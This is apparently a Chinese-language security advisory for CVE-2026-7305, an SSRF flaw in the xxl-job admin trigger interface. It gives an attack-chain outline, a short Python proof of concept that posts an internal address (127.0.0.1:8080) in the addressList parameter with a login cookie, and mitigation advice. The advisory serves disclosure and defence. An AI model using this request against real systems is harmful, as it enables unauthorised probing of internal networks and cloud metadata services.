CVE-2026-7305 CVSS 6.3 中危

CVE-2026-7305 Xuxueli xxl-job SSRF漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7305

漏洞类型

服务端请求伪造（SSRF）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Xuxueli xxl-job

漏洞概述

Xuxueli xxl-job 在 3.3.2 及之前版本中存在服务端请求伪造（SSRF）漏洞。受影响组件为任务触发接口，具体位于 `XxlJobServiceImpl.java` 的 `triggerJob` 函数。由于未对传入的 `addressList` 参数进行有效的地址校验，具有低权限的攻击者可构造恶意请求，诱导服务器向指定内网地址发起连接。尽管官方认为此功能需管理员权限操作，但在权限管理不当的情况下，该漏洞仍可被利用进行内网探测或攻击，存在一定安全风险。

技术细节

该漏洞源于 `xxl-job-admin` 模块中任务触发逻辑的安全缺陷。在处理手动触发任务请求时，`triggerJob` 方法直接解析用户提交的 `addressList` 参数，并将其作为执行器地址列表进行网络请求调用。攻击者可利用此参数传入内网 IP（如 127.0.0.1、192.168.x.x）或云元数据地址。尽管维护者强调触发操作需要登录认证且属于管理行为，但一旦攻击者获取了后台访问权限，即可通过该接口扫描内网端口、访问受限服务，甚至结合其他内网漏洞进行横向移动，扩大攻击面。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网络上运行的 Xuxueli xxl-job 实例，并确定其版本是否在受影响范围内（<= 3.3.2）。

STEP 2

2. 身份认证

攻击者尝试获取后台访问凭证。虽然 CVSS 评分为低权限，但实际利用通常需要登录后台，利用弱口令或已泄露的凭证。

STEP 3

3. 发送恶意载荷

攻击者构造 HTTP POST 请求至任务触发接口，在 `addressList` 参数中填入内网敏感地址（如 localhost、私有网段 IP 或云服务元数据地址）。

STEP 4

4. 执行 SSRF

服务器端接收请求并解析参数，随后向攻击者指定的内网地址发起连接，从而泄露内网信息或攻击内部服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip:port/xxl-job-admin/jobinfo/trigger"

# Cookies (Authentication required)
cookies = {
    "XXL_JOB_LOGIN_IDENTITY": "<cookie_value>"
}

# Payload: SSRF to internal address (e.g., 127.0.0.1:8080)
payload = {
    "id": 1,
    "executorParam": "",
    "addressList": "127.0.0.1:8080",  # Malicious internal address
    "addressType": 0
}

try:
    response = requests.post(url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("Request sent successfully. Check logs or timing for SSRF confirmation.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Xuxueli xxl-job <= 3.3.2

防御指南

临时缓解措施

建议暂时禁用非受信任用户的手动触发任务权限，或通过网络隔离手段限制 xxl-job 管理后台的访问来源。同时，应监控服务器出站流量，检测是否存在异常的内网扫描行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7305
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7305
3 Details https://www.cvedetails.com/cve/CVE-2026-7305/
4 VulDB https://vuldb.com/cve/CVE-2026-7305
5 Link https://github.com/xuxueli/xxl-job/
6 Link https://github.com/xuxueli/xxl-job/issues/3935
7 Link https://github.com/xuxueli/xxl-job/pull/3937
8 Link https://vuldb.com/submit/803076
9 Link https://vuldb.com/vuln/359960
10 Link https://vuldb.com/vuln/359960/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表